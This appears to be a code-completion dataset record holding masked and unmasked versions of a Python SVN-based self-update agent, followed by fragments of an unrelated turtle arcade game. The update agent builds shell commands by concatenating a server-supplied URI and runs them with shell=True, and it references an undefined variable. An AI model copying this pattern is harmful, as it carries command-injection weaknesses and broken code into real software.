"step-3": "<mask token>\n\n\nclass GregerUpdateAgent(Thread):\n <mask token>\n\n def __init__(self, ready=None):\n \"\"\"\n Initialize the main class\n \"\"\"\n Thread.__init__(self)\n self.ready = ready\n self.logPath = 'root.GUA'\n self.log = logging.getLogger(self.logPath)\n localLog = logging.getLogger(self.logPath + '.__init__')\n localLog.debug('Initiating Greger Update Agent (GUA)...')\n self.stopExecution = Event()\n self._location = os.path.abspath(__file__)\n self._location = self._location[:-15]\n localLog.debug('Local path: ' + self._location)\n localLog.debug('Getting configuration parameters from file...')\n config = getLocalConfig()\n self.localRevisionRecordPath = config.get('greger_update_agent',\n 'local_revision_path')\n localLog.debug('Parameter: (localRevisionRecordPath) ' + self.\n localRevisionRecordPath)\n self.log.info('Greger Update Agent (GUA) successfully initiated!')\n\n @property\n def localRevisionRecord(self):\n \"\"\"\n Get local revision record (.gcm)\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.localRevisionRecord')\n localLog.debug('Getting local revision record...')\n revisionRecordPath = self.localRevisionRecordPath\n localLog.debug('Attemption to get record from file...')\n try:\n with open(revisionRecordPath, 'r') as f:\n localRecord = f.read()\n localLog.debug('Local revision record: ' + str(localRecord))\n except Exception as e:\n self.log.warning('Failed to open file! 
- ' + str(e))\n self.localRevisionRecord = 0\n localRecord = self.localRevisionRecord\n return localRecord\n\n @localRevisionRecord.setter\n def localRevisionRecord(self, newRevision):\n \"\"\"\n Set local revision record (.gcm)\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.localRevisionRecord')\n localLog.debug('Setting local revision record (.gcm) to ' + str(\n newRevision) + '...')\n revisionRecordPath = self.localRevisionRecordPath\n localLog.debug('Attemption to write \"' + str(newRevision) +\n '\" to file...')\n with open(revisionRecordPath, 'w') as f:\n f.write(str(newRevision))\n self.log.info('Local revision record set: ' + str(newRevision))\n\n def getSoftwareInfo(self, rev='HEAD'):\n \"\"\"\n Retrieve information about a revision available on server.\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.getSoftwareInfo')\n localLog.debug('Attempting to retrieve software revision info...')\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n else:\n self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')\n return\n moduleReturn = {'revision': '', 'revision_SHA': '',\n 'revision_author': '', 'revision_date': '', 'revision_comment': ''}\n localLog.debug('Attempting to retrieve info from server... 
' +\n guaSWServerURI)\n pCmd = 'svn proplist -v -R --revprop -r ' + rev\n pCmd += ' ' + guaSWServerURI\n localLog.debug(pCmd)\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n outputList = output.splitlines()[1:]\n outputList = [elem.strip() for elem in outputList]\n revStr = output.splitlines()[0]\n revStr = revStr.split()[-1]\n moduleReturn['revision'] = revStr[:-1]\n localLog.debug('Revision: ' + revStr[:-1])\n shaStr = outputList[outputList.index('git-commit') + 1]\n moduleReturn['revision_SHA'] = shaStr\n localLog.debug('Revision SHA: ' + shaStr)\n authorStr = outputList[outputList.index('svn:author') + 1]\n moduleReturn['revision_author'] = authorStr\n localLog.debug('Revision author: ' + authorStr)\n dateStr = outputList[outputList.index('svn:date') + 1]\n moduleReturn['revision_date'] = dateStr\n localLog.debug('Revision date: ' + dateStr)\n commentStr = outputList[outputList.index('svn:log') + 1].strip()\n moduleReturn['revision_comment'] = commentStr\n localLog.debug('Revision Comment: ' + commentStr)\n if err is not None:\n localLog.debug('Error message: ' + str(err))\n except Exception as e:\n self.log.error('Oops! 
Something went wrong - ' + str(e))\n return moduleReturn\n\n def updateSoftware(self, swRev='HEAD'):\n \"\"\"\n Get and updating software from server\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.updateSoftware')\n localLog.debug('Getting software revision ' + str(swRev) +\n ' from server and updating local client...')\n localLog.debug('Constructing target path for new software...')\n targetRoot = self._location\n targetDir = 'gcm'\n targetPath = os.path.join(targetRoot, targetDir)\n localLog.debug('Target path: ' + targetPath)\n localLog.debug('Retrieving relevant parameters from server...')\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n localLog.debug('Parameter: (guaSWSource) ' + guaSWServerURI)\n else:\n self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')\n return\n localLog.debug('Getting software files from server...')\n pCmd = 'svn export --force -r ' + str(swRev)\n pCmd += ' ' + guaSWServerURI\n pCmd += ' ' + targetPath\n localLog.debug(pCmd)\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n if err is not None:\n self.log.warning('Error message: ' + str(err))\n else:\n self.log.info('Download successful!')\n for line in output.splitlines():\n self.log.info(line)\n except Exception as e:\n self.log.error('Oops! 
Something went wrong - ' + str(e))\n localLog.debug('Reading downloaded revision from \"' + output.\n splitlines()[-1] + '\"...')\n revText = output.splitlines()[-1].split()[-1][:-1]\n localLog.debug('Downloaded Revision: ' + revText)\n self.localRevisionRecord = revText\n localLog.debug('Listing downloaded files...')\n downloadedFiles = []\n for row in output.splitlines()[:-1]:\n file = os.path.join(targetRoot, [t.strip() for t in row.split()][1]\n )\n downloadedFiles.append(file)\n localLog.debug('File: ' + file)\n self.log.debug('Getting all files in local directory (after update)...'\n )\n allFiles = []\n for r, d, f in os.walk(targetPath):\n for file in f:\n allFiles.append(os.path.join(r, file))\n localLog.debug('File: ' + allFiles[-1])\n for dir in d:\n allFiles.append(os.path.join(r, dir))\n localLog.debug('Dir: ' + allFiles[-1])\n self.log.info(\n 'Identifying old files to remove (<new_files> - <all_files>)...')\n diffFiles = list(set(allFiles) - set(downloadedFiles))\n for file in diffFiles:\n self.log.info('Removing: ' + file)\n try:\n if os.path.isfile(file):\n os.unlink(file)\n elif os.path.isdir(file):\n shutil.rmtree(file)\n except Exception as e:\n self.log.warning('Oops! Something went wrong! 
- ' + str(e))\n self.log.debug('Re-getting all files in local directory...')\n allFiles = []\n for r, d, f in os.walk(targetPath):\n for file in f:\n allFiles.append(os.path.join(r, file))\n self.log.debug('File: ' + os.path.join(r, file))\n for dir in d:\n allFiles.append(os.path.join(r, dir))\n self.log.debug('Dir: ' + os.path.join(r, file))\n\n def run(self):\n \"\"\"\n Run Greger Update Agent.\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.run')\n self.log.info('Starting Greger Update Agent (GUA)...')\n localLog.debug('Wait for Greger Client Module to start...')\n self.ready.wait()\n allThreads = {}\n for thr in enumerate():\n localLog.debug(thr.name + ' ' + thr.__class__.__name__ + ' active!'\n )\n allThreads.update({thr.__class__.__name__: thr})\n if thr.__class__.__name__ == 'GregerClientModule':\n localLog.debug('Greger Client Module thread found! ' +\n allThreads['GregerClientModule'].name)\n loopCount = 0\n while not self.stopExecution.is_set():\n loopCount += 1\n localLog.debug('Checking for updates (' + str(loopCount) + ')...')\n localLog.debug('Getting local revision record...')\n localRevision = self.localRevisionRecord\n localLog.debug('Getting latest software info...')\n softwareInfo = self.getSoftwareInfo()\n self.log.info('Revision check done! 
(' + str(localRevision) + ')')\n if int(localRevision) == int(softwareInfo['revision']):\n self.log.info('No new revision found.')\n else:\n self.log.info('New revision found!')\n localLog.debug('Attempting to update software...')\n self.updateSoftware()\n localLog.debug(\n 'Attempting to update server with software info...')\n allThreads['GregerDatabase'].update('about', softwareInfo)\n self.log.info(\n 'Attempting to stop all exection before restarting...')\n allThreads['GregerClientModule'].stopAll(GUA=True)\n self.log.info('Attemption to restart application...')\n restart_program()\n if 'guaCheckUpdateDelay' in GregerDatabase.settings:\n delayTime = GregerDatabase.settings['guaCheckUpdateDelay'][\n 'value']\n else:\n delayTime = 10\n self.log.warning('Settings not defined! (using default=10)')\n self.log.info('Waiting ' + str(delayTime) + 's...')\n self.stopExecution.wait(delayTime)\n self.log.info('Greger Update Agent (GUA) execution stopped!')\n",
"step-4": "<mask token>\n\n\nclass GregerUpdateAgent(Thread):\n \"\"\"\n Main class which holds the main sequence of the application.\n \"\"\"\n\n def __init__(self, ready=None):\n \"\"\"\n Initialize the main class\n \"\"\"\n Thread.__init__(self)\n self.ready = ready\n self.logPath = 'root.GUA'\n self.log = logging.getLogger(self.logPath)\n localLog = logging.getLogger(self.logPath + '.__init__')\n localLog.debug('Initiating Greger Update Agent (GUA)...')\n self.stopExecution = Event()\n self._location = os.path.abspath(__file__)\n self._location = self._location[:-15]\n localLog.debug('Local path: ' + self._location)\n localLog.debug('Getting configuration parameters from file...')\n config = getLocalConfig()\n self.localRevisionRecordPath = config.get('greger_update_agent',\n 'local_revision_path')\n localLog.debug('Parameter: (localRevisionRecordPath) ' + self.\n localRevisionRecordPath)\n self.log.info('Greger Update Agent (GUA) successfully initiated!')\n\n @property\n def localRevisionRecord(self):\n \"\"\"\n Get local revision record (.gcm)\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.localRevisionRecord')\n localLog.debug('Getting local revision record...')\n revisionRecordPath = self.localRevisionRecordPath\n localLog.debug('Attemption to get record from file...')\n try:\n with open(revisionRecordPath, 'r') as f:\n localRecord = f.read()\n localLog.debug('Local revision record: ' + str(localRecord))\n except Exception as e:\n self.log.warning('Failed to open file! 
- ' + str(e))\n self.localRevisionRecord = 0\n localRecord = self.localRevisionRecord\n return localRecord\n\n @localRevisionRecord.setter\n def localRevisionRecord(self, newRevision):\n \"\"\"\n Set local revision record (.gcm)\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.localRevisionRecord')\n localLog.debug('Setting local revision record (.gcm) to ' + str(\n newRevision) + '...')\n revisionRecordPath = self.localRevisionRecordPath\n localLog.debug('Attemption to write \"' + str(newRevision) +\n '\" to file...')\n with open(revisionRecordPath, 'w') as f:\n f.write(str(newRevision))\n self.log.info('Local revision record set: ' + str(newRevision))\n\n def getSoftwareInfo(self, rev='HEAD'):\n \"\"\"\n Retrieve information about a revision available on server.\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.getSoftwareInfo')\n localLog.debug('Attempting to retrieve software revision info...')\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n else:\n self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')\n return\n moduleReturn = {'revision': '', 'revision_SHA': '',\n 'revision_author': '', 'revision_date': '', 'revision_comment': ''}\n localLog.debug('Attempting to retrieve info from server... 
' +\n guaSWServerURI)\n pCmd = 'svn proplist -v -R --revprop -r ' + rev\n pCmd += ' ' + guaSWServerURI\n localLog.debug(pCmd)\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n outputList = output.splitlines()[1:]\n outputList = [elem.strip() for elem in outputList]\n revStr = output.splitlines()[0]\n revStr = revStr.split()[-1]\n moduleReturn['revision'] = revStr[:-1]\n localLog.debug('Revision: ' + revStr[:-1])\n shaStr = outputList[outputList.index('git-commit') + 1]\n moduleReturn['revision_SHA'] = shaStr\n localLog.debug('Revision SHA: ' + shaStr)\n authorStr = outputList[outputList.index('svn:author') + 1]\n moduleReturn['revision_author'] = authorStr\n localLog.debug('Revision author: ' + authorStr)\n dateStr = outputList[outputList.index('svn:date') + 1]\n moduleReturn['revision_date'] = dateStr\n localLog.debug('Revision date: ' + dateStr)\n commentStr = outputList[outputList.index('svn:log') + 1].strip()\n moduleReturn['revision_comment'] = commentStr\n localLog.debug('Revision Comment: ' + commentStr)\n if err is not None:\n localLog.debug('Error message: ' + str(err))\n except Exception as e:\n self.log.error('Oops! 
Something went wrong - ' + str(e))\n return moduleReturn\n\n def updateSoftware(self, swRev='HEAD'):\n \"\"\"\n Get and updating software from server\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.updateSoftware')\n localLog.debug('Getting software revision ' + str(swRev) +\n ' from server and updating local client...')\n localLog.debug('Constructing target path for new software...')\n targetRoot = self._location\n targetDir = 'gcm'\n targetPath = os.path.join(targetRoot, targetDir)\n localLog.debug('Target path: ' + targetPath)\n localLog.debug('Retrieving relevant parameters from server...')\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n localLog.debug('Parameter: (guaSWSource) ' + guaSWServerURI)\n else:\n self.log.warning('Setting ' + str(guaSWSource) + ' not defined!')\n return\n localLog.debug('Getting software files from server...')\n pCmd = 'svn export --force -r ' + str(swRev)\n pCmd += ' ' + guaSWServerURI\n pCmd += ' ' + targetPath\n localLog.debug(pCmd)\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n if err is not None:\n self.log.warning('Error message: ' + str(err))\n else:\n self.log.info('Download successful!')\n for line in output.splitlines():\n self.log.info(line)\n except Exception as e:\n self.log.error('Oops! 
Something went wrong - ' + str(e))\n localLog.debug('Reading downloaded revision from \"' + output.\n splitlines()[-1] + '\"...')\n revText = output.splitlines()[-1].split()[-1][:-1]\n localLog.debug('Downloaded Revision: ' + revText)\n self.localRevisionRecord = revText\n localLog.debug('Listing downloaded files...')\n downloadedFiles = []\n for row in output.splitlines()[:-1]:\n file = os.path.join(targetRoot, [t.strip() for t in row.split()][1]\n )\n downloadedFiles.append(file)\n localLog.debug('File: ' + file)\n self.log.debug('Getting all files in local directory (after update)...'\n )\n allFiles = []\n for r, d, f in os.walk(targetPath):\n for file in f:\n allFiles.append(os.path.join(r, file))\n localLog.debug('File: ' + allFiles[-1])\n for dir in d:\n allFiles.append(os.path.join(r, dir))\n localLog.debug('Dir: ' + allFiles[-1])\n self.log.info(\n 'Identifying old files to remove (<new_files> - <all_files>)...')\n diffFiles = list(set(allFiles) - set(downloadedFiles))\n for file in diffFiles:\n self.log.info('Removing: ' + file)\n try:\n if os.path.isfile(file):\n os.unlink(file)\n elif os.path.isdir(file):\n shutil.rmtree(file)\n except Exception as e:\n self.log.warning('Oops! Something went wrong! 
- ' + str(e))\n self.log.debug('Re-getting all files in local directory...')\n allFiles = []\n for r, d, f in os.walk(targetPath):\n for file in f:\n allFiles.append(os.path.join(r, file))\n self.log.debug('File: ' + os.path.join(r, file))\n for dir in d:\n allFiles.append(os.path.join(r, dir))\n self.log.debug('Dir: ' + os.path.join(r, file))\n\n def run(self):\n \"\"\"\n Run Greger Update Agent.\n \"\"\"\n localLog = logging.getLogger(self.logPath + '.run')\n self.log.info('Starting Greger Update Agent (GUA)...')\n localLog.debug('Wait for Greger Client Module to start...')\n self.ready.wait()\n allThreads = {}\n for thr in enumerate():\n localLog.debug(thr.name + ' ' + thr.__class__.__name__ + ' active!'\n )\n allThreads.update({thr.__class__.__name__: thr})\n if thr.__class__.__name__ == 'GregerClientModule':\n localLog.debug('Greger Client Module thread found! ' +\n allThreads['GregerClientModule'].name)\n loopCount = 0\n while not self.stopExecution.is_set():\n loopCount += 1\n localLog.debug('Checking for updates (' + str(loopCount) + ')...')\n localLog.debug('Getting local revision record...')\n localRevision = self.localRevisionRecord\n localLog.debug('Getting latest software info...')\n softwareInfo = self.getSoftwareInfo()\n self.log.info('Revision check done! 
(' + str(localRevision) + ')')\n if int(localRevision) == int(softwareInfo['revision']):\n self.log.info('No new revision found.')\n else:\n self.log.info('New revision found!')\n localLog.debug('Attempting to update software...')\n self.updateSoftware()\n localLog.debug(\n 'Attempting to update server with software info...')\n allThreads['GregerDatabase'].update('about', softwareInfo)\n self.log.info(\n 'Attempting to stop all exection before restarting...')\n allThreads['GregerClientModule'].stopAll(GUA=True)\n self.log.info('Attemption to restart application...')\n restart_program()\n if 'guaCheckUpdateDelay' in GregerDatabase.settings:\n delayTime = GregerDatabase.settings['guaCheckUpdateDelay'][\n 'value']\n else:\n delayTime = 10\n self.log.warning('Settings not defined! (using default=10)')\n self.log.info('Waiting ' + str(delayTime) + 's...')\n self.stopExecution.wait(delayTime)\n self.log.info('Greger Update Agent (GUA) execution stopped!')\n",
"step-5": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nGreger Update Agent (GUA) module for the Greger Client Module\n\"\"\"\n\n__author__ = \"Eric Sandbling\"\n__license__ = 'MIT'\n__status__ = 'Development'\n\n# System modules\nimport os, sys\nimport shutil\nimport logging\nimport subprocess\nfrom threading import Event\nfrom threading import Thread\nfrom threading import enumerate\n\n# Local Modules\nfrom common import getLocalConfig\nfrom common import restart_program\nfrom gdb import GregerDatabase\n# from gcm import GregerClientModule\n\nclass GregerUpdateAgent(Thread):\n \"\"\"\n Main class which holds the main sequence of the application.\n \"\"\"\n\n def __init__(self, ready=None):\n '''\n Initialize the main class\n '''\n Thread.__init__(self)\n self.ready = ready\n\n # Setup logging\n self.logPath = \"root.GUA\"\n self.log = logging.getLogger(self.logPath)\n localLog = logging.getLogger(self.logPath + \".__init__\")\n localLog.debug(\"Initiating Greger Update Agent (GUA)...\")\n\n # Stop execution handler\n self.stopExecution = Event()\n\n # Get local path\n self._location = os.path.abspath(__file__)\n self._location = self._location[:-15] # Trim gcm/__main__.py from path to get at location of application\n localLog.debug(\"Local path: \" + self._location)\n\n # Get Local Configuration Parameters\n localLog.debug(\"Getting configuration parameters from file...\")\n config = getLocalConfig()\n\n # Locally relevant parameters\n self.localRevisionRecordPath = config.get(\"greger_update_agent\", \"local_revision_path\")\n localLog.debug(\"Parameter: (localRevisionRecordPath) \" + self.localRevisionRecordPath)\n\n\n self.log.info(\"Greger Update Agent (GUA) successfully initiated!\")\n\n @property\n def localRevisionRecord(self):\n '''\n Get local revision record (.gcm)\n '''\n # Logging\n localLog = logging.getLogger(self.logPath + \".localRevisionRecord\")\n localLog.debug(\"Getting local revision record...\")\n\n # Local parameters\n # 
revisionRecordPath = os.path.join(self._location, \".gcm\")\n revisionRecordPath = self.localRevisionRecordPath\n\n localLog.debug(\"Attemption to get record from file...\")\n try:\n with open(revisionRecordPath,\"r\") as f:\n localRecord = f.read()\n localLog.debug(\"Local revision record: \" + str(localRecord))\n except Exception as e:\n self.log.warning(\"Failed to open file! - \" + str(e))\n self.localRevisionRecord = 0\n localRecord = self.localRevisionRecord\n\n return localRecord\n\n @localRevisionRecord.setter\n def localRevisionRecord(self, newRevision):\n '''\n Set local revision record (.gcm)\n '''\n # Logging\n localLog = logging.getLogger(self.logPath + \".localRevisionRecord\")\n localLog.debug(\"Setting local revision record (.gcm) to \" + str(newRevision) + \"...\")\n\n # Local parameters\n # revisionRecordPath = os.path.join(self._location, \".gcm\")\n revisionRecordPath = self.localRevisionRecordPath\n\n localLog.debug(\"Attemption to write \\\"\" + str(newRevision) + \"\\\" to file...\")\n with open(revisionRecordPath,\"w\") as f:\n f.write(str(newRevision))\n self.log.info(\"Local revision record set: \" + str(newRevision))\n\n def getSoftwareInfo(self, rev='HEAD'):\n '''\n Retrieve information about a revision available on server.\n '''\n # Logging\n localLog = logging.getLogger(self.logPath + \".getSoftwareInfo\")\n localLog.debug(\"Attempting to retrieve software revision info...\")\n\n # Locally relevant parameters\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n else:\n self.log.warning(\"Setting \" + str(guaSWSource) + \" not defined!\")\n return\n moduleReturn = {\n 'revision': \"\",\n 'revision_SHA' : \"\",\n 'revision_author' : \"\",\n 'revision_date' : \"\",\n 'revision_comment' : \"\"\n }\n\n # Get server revision info\n localLog.debug(\"Attempting to retrieve info from server... 
\" + guaSWServerURI)\n pCmd = \"svn proplist -v -R --revprop -r \" + rev\n pCmd += \" \" + guaSWServerURI\n localLog.debug(pCmd)\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n (output, err) = p.communicate()\n\n # Create list of output and remove extra white spaces\n outputList = output.splitlines()[1:]\n outputList = [elem.strip() for elem in outputList]\n\n # Get revision from output\n revStr = output.splitlines()[0]\n revStr = revStr.split()[-1]\n moduleReturn['revision'] = revStr[:-1]\n localLog.debug(\"Revision: \" + revStr[:-1])\n\n # Get SHA\n shaStr = outputList[outputList.index('git-commit')+1]\n moduleReturn['revision_SHA'] = shaStr\n localLog.debug(\"Revision SHA: \" + shaStr)\n\n # Get revision author\n authorStr = outputList[outputList.index('svn:author')+1]\n moduleReturn['revision_author'] = authorStr\n localLog.debug(\"Revision author: \" + authorStr)\n\n # Get revision date\n dateStr = outputList[outputList.index('svn:date')+1]\n moduleReturn['revision_date'] = dateStr\n localLog.debug(\"Revision date: \" + dateStr)\n\n # Get revision comment\n commentStr = outputList[outputList.index('svn:log')+1].strip()\n moduleReturn['revision_comment'] = commentStr\n localLog.debug(\"Revision Comment: \" + commentStr)\n\n if err is not None:\n localLog.debug(\"Error message: \" + str(err))\n\n except Exception as e:\n self.log.error(\"Oops! 
Something went wrong - \" + str(e))\n\n return moduleReturn\n\n def updateSoftware(self, swRev='HEAD'):\n '''\n Get and updating software from server\n '''\n # Logging\n localLog = logging.getLogger(self.logPath + \".updateSoftware\")\n localLog.debug(\"Getting software revision \" + str(swRev) + \" from server and updating local client...\")\n\n # Locally relevant parameters\n localLog.debug(\"Constructing target path for new software...\")\n targetRoot = self._location\n targetDir = \"gcm\"\n targetPath = os.path.join(targetRoot, targetDir)\n localLog.debug(\"Target path: \" + targetPath)\n localLog.debug(\"Retrieving relevant parameters from server...\")\n if 'guaSWSource' in GregerDatabase.settings:\n guaSWServerURI = GregerDatabase.settings['guaSWSource']['value']\n localLog.debug(\"Parameter: (guaSWSource) \" + guaSWServerURI)\n else:\n self.log.warning(\"Setting \" + str(guaSWSource) + \" not defined!\")\n return\n\n # Get software files from server\n localLog.debug(\"Getting software files from server...\")\n\n # Compile download command\n pCmd = \"svn export --force -r \" + str(swRev)\n pCmd += \" \" + guaSWServerURI\n pCmd += \" \" + targetPath\n localLog.debug(pCmd)\n\n # Execute command\n try:\n p = subprocess.Popen(pCmd, stdout=subprocess.PIPE, shell=True)\n (output, err) = p.communicate()\n\n if err is not None:\n self.log.warning(\"Error message: \" + str(err))\n else:\n self.log.info(\"Download successful!\")\n # Print output\n for line in output.splitlines():\n self.log.info(line)\n\n except Exception as e:\n self.log.error(\"Oops! 
Something went wrong - \" + str(e))\n\n # Read revision text\n localLog.debug(\"Reading downloaded revision from \\\"\" + output.splitlines()[-1] + \"\\\"...\")\n revText = output.splitlines()[-1].split()[-1][:-1]\n localLog.debug(\"Downloaded Revision: \" + revText)\n\n # Update local revision record\n self.localRevisionRecord = revText\n\n # Get downloaded files text\n localLog.debug(\"Listing downloaded files...\")\n downloadedFiles = []\n for row in output.splitlines()[:-1]:\n file = os.path.join(targetRoot, [t.strip() for t in row.split()][1])\n downloadedFiles.append(file)\n localLog.debug(\"File: \" + file)\n\n # List files in directory\n self.log.debug(\"Getting all files in local directory (after update)...\")\n allFiles = []\n # r=root, d=directories, f = files\n for r, d, f in os.walk(targetPath):\n for file in f:\n # allFiles.append(os.path.abspath(file))\n allFiles.append(os.path.join(r, file))\n localLog.debug(\"File: \" + allFiles[-1])\n # localLog.debug(\"File: \" + os.path.join(r, file))\n for dir in d:\n # allFiles.append(os.path.abspath(dir))\n allFiles.append(os.path.join(r, dir))\n localLog.debug(\"Dir: \" + allFiles[-1])\n # localLog.debug(\"Dir: \" + os.path.join(r, dir))\n\n self.log.info(\"Identifying old files to remove (<new_files> - <all_files>)...\")\n diffFiles = list(set(allFiles) - set(downloadedFiles))\n for file in diffFiles:\n self.log.info(\"Removing: \" + file)\n try:\n if os.path.isfile(file):\n os.unlink(file)\n elif os.path.isdir(file):\n shutil.rmtree(file)\n except Exception as e:\n self.log.warning(\"Oops! Something went wrong! 
- \" + str(e))\n\n # List files in directory\n self.log.debug(\"Re-getting all files in local directory...\")\n allFiles = []\n # r=root, d=directories, f = files\n for r, d, f in os.walk(targetPath):\n for file in f:\n allFiles.append(os.path.join(r, file))\n self.log.debug(\"File: \" + os.path.join(r, file))\n for dir in d:\n allFiles.append(os.path.join(r, dir))\n self.log.debug(\"Dir: \" + os.path.join(r, file))\n\n def run(self):\n '''\n Run Greger Update Agent.\n '''\n # Logging\n localLog = logging.getLogger(self.logPath + \".run\")\n self.log.info(\"Starting Greger Update Agent (GUA)...\")\n\n # Wait for Greger Client Module to start...\n localLog.debug(\"Wait for Greger Client Module to start...\")\n self.ready.wait()\n\n # Get all active threads!\n allThreads = {}\n for thr in enumerate():\n localLog.debug(thr.name + \" \" + thr.__class__.__name__ +\" active!\")\n allThreads.update({thr.__class__.__name__ : thr})\n if thr.__class__.__name__ == \"GregerClientModule\":\n localLog.debug(\"Greger Client Module thread found! \" +\n allThreads['GregerClientModule'].name)\n\n # Start checking for updates\n loopCount = 0\n while not self.stopExecution.is_set():\n loopCount += 1\n localLog.debug(\"Checking for updates (\" + str(loopCount) + \")...\")\n\n # Get local revision record\n localLog.debug(\"Getting local revision record...\")\n localRevision = self.localRevisionRecord\n\n # Get server revision...\n localLog.debug(\"Getting latest software info...\")\n softwareInfo = self.getSoftwareInfo()\n self.log.info(\"Revision check done! 
(\" + str(localRevision) + \")\")\n\n if int(localRevision) == int(softwareInfo['revision']):\n self.log.info(\"No new revision found.\")\n else:\n self.log.info(\"New revision found!\")\n\n # Do update!!\n localLog.debug(\"Attempting to update software...\")\n self.updateSoftware()\n\n # Update server with updated software\n localLog.debug(\"Attempting to update server with software info...\")\n allThreads['GregerDatabase'].update('about', softwareInfo)\n\n # Tell GCM to stop all treads (except GUA)...\n self.log.info(\"Attempting to stop all exection before restarting...\")\n allThreads['GregerClientModule'].stopAll(GUA=True)\n\n # Restart Application\n self.log.info(\"Attemption to restart application...\")\n restart_program()\n\n if 'guaCheckUpdateDelay' in GregerDatabase.settings:\n delayTime = GregerDatabase.settings['guaCheckUpdateDelay']['value']\n else:\n delayTime = 10\n self.log.warning(\"Settings not defined! (using default=10)\")\n\n # Wait update delay\n self.log.info(\"Waiting \" + str(delayTime) + \"s...\")\n self.stopExecution.wait(delayTime)\n\n self.log.info(\"Greger Update Agent (GUA) execution stopped!\")\n",
"step-ids": [
5,
6,
7,
8,
11
]
}
|
[
5,
6,
7,
8,
11
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
wn.title('MaskUp')
wn.bgcolor('green')
wn.bgpic('retro_city_title_page.gif')
wn.setup(width=800, height=600)
wn.tracer(0)
wn.register_shape('human.gif')
def game_loop():
score = 0
lives = 3
wn.register_shape('human.gif')
wn.register_shape('Evil-Virus.gif')
wn.register_shape('surgical-mask.gif')
player = turtle.Turtle()
player.speed(0)
player.shape('human.gif')
player.color('white')
player.penup()
player.goto(0, -250)
player.direction = 'stop'
good_guys = []
for _ in range(3):
good_guy = turtle.Turtle()
good_guy.speed(0)
good_guy.shape('surgical-mask.gif')
good_guy.color('blue')
good_guy.penup()
good_guy.goto(-100, 250)
good_guy.speed = random.uniform(0.3, 2.0)
good_guys.append(good_guy)
bad_guys = []
for _ in range(5):
bad_guy = turtle.Turtle()
bad_guy.speed(0)
bad_guy.shape('Evil-Virus.gif')
bad_guy.color('red')
bad_guy.penup()
bad_guy.goto(100, 250)
bad_guy.speed = random.uniform(0.3, 1.0)
bad_guys.append(bad_guy)
pen = turtle.Turtle()
pen.hideturtle()
pen.speed(0)
pen.shape('square')
pen.color('white')
pen.penup()
pen.goto(0, 260)
font = 'Courier', 24, 'normal'
pen.write('Score: {} Lives: {}'.format(score, lives), align='center',
font=font)
def show_message(score):
message = turtle.Turtle()
message.hideturtle()
message.speed(0)
message.color('yellow')
message.penup()
message.goto(0, 0)
font = 'Calibri', 24, 'bold'
message.write(
'GAME OVER: TOO MUCH EXPOSURE TO VIRUS\n Score: {}\n!MASK UP and STAY SAFE!'
.format(score), align='center', font=font)
def go_left():
player.direction = 'left'
def go_right():
player.direction = 'right'
def stop_player():
player.direction = 'stop'
wn.listen()
wn.onkeypress(go_left, 'Left')
wn.onkeyrelease(stop_player, 'Left')
wn.onkeypress(go_right, 'Right')
wn.onkeyrelease(stop_player, 'Right')
while True:
wn.update()
if player.direction == 'left':
x = player.xcor()
if x > -365:
x -= 0.8
player.setx(x)
if player.direction == 'right':
x = player.xcor()
if x < 365:
x += 0.8
player.setx(x)
for good_guy in good_guys:
y = good_guy.ycor()
y -= good_guy.speed
good_guy.sety(y)
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
if good_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
good_guy.goto(x, y)
score += 10
pen.clear()
pen.write('Score: {} Lives: {}'.format(score, lives), align
='center', font=font)
winsound.PlaySound('video_game_retro_8bit_coin', winsound.
SND_FILENAME)
for bad_guy in bad_guys:
y = bad_guy.ycor()
y -= bad_guy.speed
bad_guy.sety(y)
if y < -300:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
if bad_guy.distance(player) < 40:
x = random.randint(-380, 380)
y = random.randint(300, 400)
bad_guy.goto(x, y)
score -= 10
lives -= 1
pen.clear()
pen.write('Score: {} Lives: {}'.format(score, lives), align
='center', font=font)
winsound.PlaySound('arcade_game_alarm_short', winsound.
SND_FILENAME)
if lives <= 0:
pen.clear()
bad_guy.clear()
good_guy.clear()
show_message(score)
winsound.PlaySound('game_over_sound', winsound.SND_FILENAME)
break
while True:
wn.update()
wn.bgpic('retro_city.gif')
winsound.PlaySound('retro_video_game_music-trimmed', winsound.SND_LOOP)
game_loop()
turtle.Screen().clear()
wn = turtle.Screen()
wn.title('MaskUp')
wn.bgcolor('green')
wn.bgpic('retro_city_title_page.gif')
wn.setup(width=800, height=600)
wn.tracer(0)
wn.mainloop()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
wn = turtle.Screen()
wn.title('MaskUp')
wn.bgcolor('green')
wn.bgpic('retro_city_title_page.gif')
wn.setup(width=800, height=600)
wn.tracer(0)
